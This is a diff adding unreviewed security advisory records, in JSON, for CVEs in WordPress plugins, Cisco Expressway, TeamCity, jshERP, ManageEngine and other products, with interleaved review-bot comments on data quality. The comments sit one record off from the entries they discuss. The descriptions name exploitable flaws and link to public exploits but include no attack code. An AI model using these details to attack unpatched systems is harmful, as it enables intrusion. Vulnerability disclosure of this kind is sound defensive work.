+ "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/panterasoft-hdd-health-search-path-or-unquoted-item-vulnerability"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-428"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T12:15:49Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6rq5-p8rc-hp83/GHSA-6rq5-p8rc-hp83.json b/advisories/unreviewed/2024/02/GHSA-6rq5-p8rc-hp83/GHSA-6rq5-p8rc-hp83.json
new file mode 100644
index 0000000000000..86cfd031bfc50
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6rq5-p8rc-hp83/GHSA-6rq5-p8rc-hp83.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6rq5-p8rc-hp83",
+ "modified": "2024-02-02T15:30:28Z",
+ "published": "2024-02-02T15:30:28Z",
+ "aliases": [
+ "CVE-2024-1184"
+ ],
+ "details": "A vulnerability was found in Nsasoft Network Sleuth 3.0.0.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-252674 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1184"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fitoxs.com/vuldb/10-exploit-perl.txt"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252674"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252674"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T13:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6wvv-3xrf-xrf6/GHSA-6wvv-3xrf-xrf6.json b/advisories/unreviewed/2024/02/GHSA-6wvv-3xrf-xrf6/GHSA-6wvv-3xrf-xrf6.json
new file mode 100644
index 0000000000000..cef0908334565
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6wvv-3xrf-xrf6/GHSA-6wvv-3xrf-xrf6.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6wvv-3xrf-xrf6",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-07T18:30:27Z",
+ "aliases": [
+ "CVE-2024-20252"
+ ],
+ "details": "Multiple vulnerabilities in Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an unauthenticated, remote attacker to conduct cross-site request forgery (CSRF) attacks that perform arbitrary actions on an affected device. \n\n Note: \"Cisco Expressway Series\" refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices.\n\n For more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20252"
+ },
+ {
+ "type": "WEB",
+ "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-csrf-KnnZDMj3"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T17:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6xj8-7c6f-w9rq/GHSA-6xj8-7c6f-w9rq.json b/advisories/unreviewed/2024/02/GHSA-6xj8-7c6f-w9rq/GHSA-6xj8-7c6f-w9rq.json
new file mode 100644
index 0000000000000..cb089665b8494
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6xj8-7c6f-w9rq/GHSA-6xj8-7c6f-w9rq.json
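Review bot: The `details` text ends with `see the Details [\"#details\"] section of this advisory`, a relative in-page anchor copied from the Cisco advisory that points nowhere inside this record and renders as a dangling link in any consumer. Since the full Cisco advisory is already listed in `references`, the bracketed `[\"#details\"]` fragment — or the whole trailing sentence — can be dropped without losing information. The ` \n\n ` runs inside the same string are likewise import artefacts that a whitespace normalisation at import time would remove.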
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6xj8-7c6f-w9rq",
+ "modified": "2024-02-06T18:30:21Z",
+ "published": "2024-02-06T18:30:21Z",
+ "aliases": [
+ "CVE-2024-24000"
+ ],
+ "details": "jshERP v3.3 is vulnerable to Arbitrary File Upload. The jshERP-boot/systemConfig/upload interface does not check the uploaded file type, and the biz parameter can be spliced into the upload path, resulting in arbitrary file uploads with controllable paths.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24000"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24000.txt"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/jishenghua/jshERP"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T16:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-723r-pvr9-6p2w/GHSA-723r-pvr9-6p2w.json b/advisories/unreviewed/2024/02/GHSA-723r-pvr9-6p2w/GHSA-723r-pvr9-6p2w.json
new file mode 100644
index 0000000000000..c4743b74b053d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-723r-pvr9-6p2w/GHSA-723r-pvr9-6p2w.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-723r-pvr9-6p2w",
+ "modified": "2024-02-07T03:30:32Z",
+ "published": "2024-02-07T03:30:32Z",
+ "aliases": [
+ "CVE-2024-1267"
+ ],
+ "details": "A vulnerability, which was classified as problematic, has been found in CodeAstro Restaurant POS System 1.0. Affected by this issue is some unknown functionality of the file create_account.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-253010 is the identifier assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1267"
+ },
+ {
+ "type": "WEB",
+ "url": "https://drive.google.com/drive/folders/18N_20KuGPjrBbvOMSfbvBIc1sMKyycH3?usp=sharing"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.253010"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.253010"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-72xj-cfw6-3c4q/GHSA-72xj-cfw6-3c4q.json b/advisories/unreviewed/2024/02/GHSA-72xj-cfw6-3c4q/GHSA-72xj-cfw6-3c4q.json
new file mode 100644
index 0000000000000..9e044c650db92
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-72xj-cfw6-3c4q/GHSA-72xj-cfw6-3c4q.json
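Review bot: The second reference is a Google Drive shared folder (`drive.google.com/drive/folders/...?usp=sharing`), which is mutable, can be withdrawn by its owner at any time and cannot be verified later, yet it is the only source for the claim apart from the VulDB entries that cite it. An archived snapshot or the project's own issue tracker would be a more durable reference; the same durability concern applies to the personal-repository write-ups referenced in GHSA-6h6q-fm45-w3hv and GHSA-6xj8-7c6f-w9rq. Nothing in the record itself is wrong, so this is a data-quality point for review rather than a blocker.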
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-72xj-cfw6-3c4q",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2023-6989"
+ ],
+ "details": "The Shield Security – Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6989"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3013699%40wp-simple-firewall&new=3013699%40wp-simple-firewall&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/063826cc-7ff3-4869-9831-f6a4a4bbe74c?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-73g2-fg3c-4vx6/GHSA-73g2-fg3c-4vx6.json b/advisories/unreviewed/2024/02/GHSA-73g2-fg3c-4vx6/GHSA-73g2-fg3c-4vx6.json
new file mode 100644
index 0000000000000..4374f3d4184be
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-73g2-fg3c-4vx6/GHSA-73g2-fg3c-4vx6.json
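Review bot: The plugins.trac.wordpress.org changeset reference compares a revision with itself (`old=3013699%40wp-simple-firewall&new=3013699%40wp-simple-firewall`), so the linked diff is empty and does not show the fix; the query string also repeats `sfp_email=&sfph_mail=` twice, which looks like a form-generated URL pasted verbatim. For an unauthenticated file-inclusion rated CRITICAL, a reference to the actual fixing changeset in the form the other WordPress records in this batch use, `https://plugins.trac.wordpress.org/changeset/<FIX_REVISION>/wp-simple-firewall` (revision to be confirmed against the Wordfence entry), would be far more useful to anyone triaging it. `cwe_ids` is also empty although the description names a specific weakness class, so the tag should be filled at review time.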
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-73g2-fg3c-4vx6",
+ "modified": "2024-02-05T06:30:31Z",
+ "published": "2024-02-05T06:30:31Z",
+ "aliases": [
+ "CVE-2024-20016"
+ ],
+ "details": "In ged, there is a possible out of bounds write due to an integer overflow. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation Patch ID: ALPS07835901; Issue ID: ALPS07835901.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20016"
+ },
+ {
+ "type": "WEB",
+ "url": "https://corp.mediatek.com/product-security-bulletin/February-2024"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T06:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-73v5-rhgg-73mq/GHSA-73v5-rhgg-73mq.json b/advisories/unreviewed/2024/02/GHSA-73v5-rhgg-73mq/GHSA-73v5-rhgg-73mq.json
new file mode 100644
index 0000000000000..1a9c55d72f4ac
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-73v5-rhgg-73mq/GHSA-73v5-rhgg-73mq.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-73v5-rhgg-73mq",
+ "modified": "2024-02-06T12:30:30Z",
+ "published": "2024-02-06T12:30:30Z",
+ "aliases": [
+ "CVE-2024-23917"
+ ],
+ "details": "In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23917"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jetbrains.com/privacy-security/issues-fixed/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-288"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T10:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-75gj-wpvg-hgcq/GHSA-75gj-wpvg-hgcq.json b/advisories/unreviewed/2024/02/GHSA-75gj-wpvg-hgcq/GHSA-75gj-wpvg-hgcq.json
new file mode 100644
index 0000000000000..693f01ce18047
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-75gj-wpvg-hgcq/GHSA-75gj-wpvg-hgcq.json
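Review bot: The only non-NVD reference for this CRITICAL unauthenticated-to-RCE advisory is `https://www.jetbrains.com/privacy-security/issues-fixed/`, a rolling page that is rewritten as further CVEs are added, so a reader following it later may not find CVE-2024-23917 or the 2023.11.3 fix at all. A version-specific vendor notice for this CVE, if one is published, or an archived snapshot of the page as of the `modified` date would give operators a stable pointer for the patch. The one-line `details` also lacks a terminating period and any statement of the affected component, which is worth expanding at review time.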
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-75gj-wpvg-hgcq",
+ "modified": "2024-02-02T00:31:28Z",
+ "published": "2024-02-02T00:31:28Z",
+ "aliases": [
+ "CVE-2023-50939"
+ ],
+ "details": "IBM PowerSC 1.3, 2.0, and 2.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 275129.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50939"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275129"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7113759"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-327"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T00:15:54Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-75pw-9w79-3j7q/GHSA-75pw-9w79-3j7q.json b/advisories/unreviewed/2024/02/GHSA-75pw-9w79-3j7q/GHSA-75pw-9w79-3j7q.json
new file mode 100644
index 0000000000000..ed9543898dded
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-75pw-9w79-3j7q/GHSA-75pw-9w79-3j7q.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-75pw-9w79-3j7q",
+ "modified": "2024-02-08T00:32:18Z",
+ "published": "2024-02-05T09:30:28Z",
+ "aliases": [
+ "CVE-2024-24839"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc allows Stored XSS.This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.6.1.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24839"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/structured-content/wordpress-structured-content-json-ld-plugin-1-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T07:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-767m-gj6q-4gx8/GHSA-767m-gj6q-4gx8.json b/advisories/unreviewed/2024/02/GHSA-767m-gj6q-4gx8/GHSA-767m-gj6q-4gx8.json
new file mode 100644
index 0000000000000..aa4147240b9d8
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-767m-gj6q-4gx8/GHSA-767m-gj6q-4gx8.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-767m-gj6q-4gx8",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2023-48792"
+ ],
+ "details": "Zoho ManageEngine ADAudit Plus through 7250 is vulnerable to SQL Injection in the report export option.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48792"
+ },
+ {
+ "type": "WEB",
+ "url": "https://manageengine.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T02:15:16Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-76cv-2f7v-55xx/GHSA-76cv-2f7v-55xx.json b/advisories/unreviewed/2024/02/GHSA-76cv-2f7v-55xx/GHSA-76cv-2f7v-55xx.json
new file mode 100644
index 0000000000000..b0a834b42bbf1
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-76cv-2f7v-55xx/GHSA-76cv-2f7v-55xx.json
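Review bot: The `https://manageengine.com` reference is the vendor's bare home page and carries no advisory-specific content; only the `sqlfix-7271.html` page does, and that page's name already implies the fixed build. Dropping the home-page entry, or retyping it as `PACKAGE` (the reference type used for project home pages elsewhere in this database) so consumers do not present it as a source, would keep `references` signal-only. With `severity` empty and `cwe_ids` empty for what the text describes as SQL injection, this record is also a good candidate for review since the fix build is identifiable from the reference.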
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-76cv-2f7v-55xx",
+ "modified": "2024-02-04T21:30:44Z",
+ "published": "2024-02-04T21:30:44Z",
+ "aliases": [
+ "CVE-2021-46903"
+ ],
+ "details": "An issue was discovered in LTOS-Web-Interface in Meinberg LANTIME-Firmware before 6.24.029 MBGID-9343 and 7 before 7.04.008 MBGID-6303. An admin can delete required user accounts (in violation of expected access control).",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-46903"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.meinberg.de/german/news/meinberg-security-advisory-mbgsa-2021-03-meinberg-lantime-firmware-v7-04-008-und-v6-24-029.htm"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-04T21:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-76q5-rvjr-8vhj/GHSA-76q5-rvjr-8vhj.json b/advisories/unreviewed/2024/02/GHSA-76q5-rvjr-8vhj/GHSA-76q5-rvjr-8vhj.json
new file mode 100644
index 0000000000000..c700785536cbd
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-76q5-rvjr-8vhj/GHSA-76q5-rvjr-8vhj.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-76q5-rvjr-8vhj",
+ "modified": "2024-02-03T03:30:27Z",
+ "published": "2024-02-01T15:30:24Z",
+ "aliases": [
+ "CVE-2024-24062"
+ ],
+ "details": "springboot-manager v1.6 is vulnerable to Cross Site Scripting (XSS) via /sys/role.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24062"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#12-stored-cross-site-scripting-sysrole"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T14:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-77c4-m4jj-64q2/GHSA-77c4-m4jj-64q2.json b/advisories/unreviewed/2024/02/GHSA-77c4-m4jj-64q2/GHSA-77c4-m4jj-64q2.json
new file mode 100644
index 0000000000000..ac01f6e0a78d6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-77c4-m4jj-64q2/GHSA-77c4-m4jj-64q2.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-77c4-m4jj-64q2",
+ "modified": "2024-02-05T00:30:16Z",
+ "published": "2024-02-05T00:30:16Z",
+ "aliases": [
+ "CVE-2024-25089"
+ ],
+ "details": "Malwarebytes Binisoft Windows Firewall Control before 6.9.9.2 allows remote attackers to execute arbitrary code via gRPC named pipes.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25089"
+ },
+ {
+ "type": "WEB",
+ "url": "https://hackerone.com/reports/2300061"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.binisoft.org/changelog.txt"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-04T22:15:23Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-77pp-vwgv-x2jq/GHSA-77pp-vwgv-x2jq.json b/advisories/unreviewed/2024/02/GHSA-77pp-vwgv-x2jq/GHSA-77pp-vwgv-x2jq.json
new file mode 100644
index 0000000000000..2c642dd2036c8
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-77pp-vwgv-x2jq/GHSA-77pp-vwgv-x2jq.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-77pp-vwgv-x2jq",
+ "modified": "2024-02-01T12:30:22Z",
+ "published": "2024-02-01T12:30:22Z",
+ "aliases": [
+ "CVE-2023-51540"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kunal Nagar Custom 404 Pro allows Stored XSS.This issue affects Custom 404 Pro: from n/a through 3.10.0.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51540"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/custom-404-pro/wordpress-custom-404-pro-plugin-3-10-0-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T11:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-78h2-jh6j-hhgf/GHSA-78h2-jh6j-hhgf.json b/advisories/unreviewed/2024/02/GHSA-78h2-jh6j-hhgf/GHSA-78h2-jh6j-hhgf.json
new file mode 100644
index 0000000000000..15e265ec28d0e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-78h2-jh6j-hhgf/GHSA-78h2-jh6j-hhgf.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-78h2-jh6j-hhgf",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0586"
+ ],
+ "details": "The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Login/Register Element in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the custom login URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0586"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Login_Register.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-78jq-x5w5-4mwh/GHSA-78jq-x5w5-4mwh.json b/advisories/unreviewed/2024/02/GHSA-78jq-x5w5-4mwh/GHSA-78jq-x5w5-4mwh.json
new file mode 100644
index 0000000000000..9c15693a726f1
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-78jq-x5w5-4mwh/GHSA-78jq-x5w5-4mwh.json
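Review bot: The CVSS vector records `PR:N` while the description says the attack requires `authenticated attackers with contributor-level and above permissions`; one of the two is wrong, and `PR:L` is the usual scoring for contributor-level stored XSS. The vector is presumably copied from NVD, so it is worth cross-checking against the Wordfence record in `references` before this advisory is reviewed. `cwe_ids` is empty although the description is stored cross-site scripting, which sibling records in this batch tag as `CWE-79`; the same empty `cwe_ids` alongside a weakness-naming description occurs in GHSA-72xj-cfw6-3c4q, GHSA-7cgq-w654-fmv8 and GHSA-7frw-5wm8-4qp7.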
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-78jq-x5w5-4mwh",
+ "modified": "2024-02-02T21:31:29Z",
+ "published": "2024-02-02T21:31:29Z",
+ "aliases": [
+ "CVE-2024-1189"
+ ],
+ "details": "A vulnerability has been found in AMPPS 2.7 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Encryption Passphrase Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252679. NOTE: The vendor explains that AMPPS 4.0 is a complete overhaul and the code was re-written.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1189"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fitoxs.com/vuldb/15-exploit-perl.txt"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252679"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252679"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
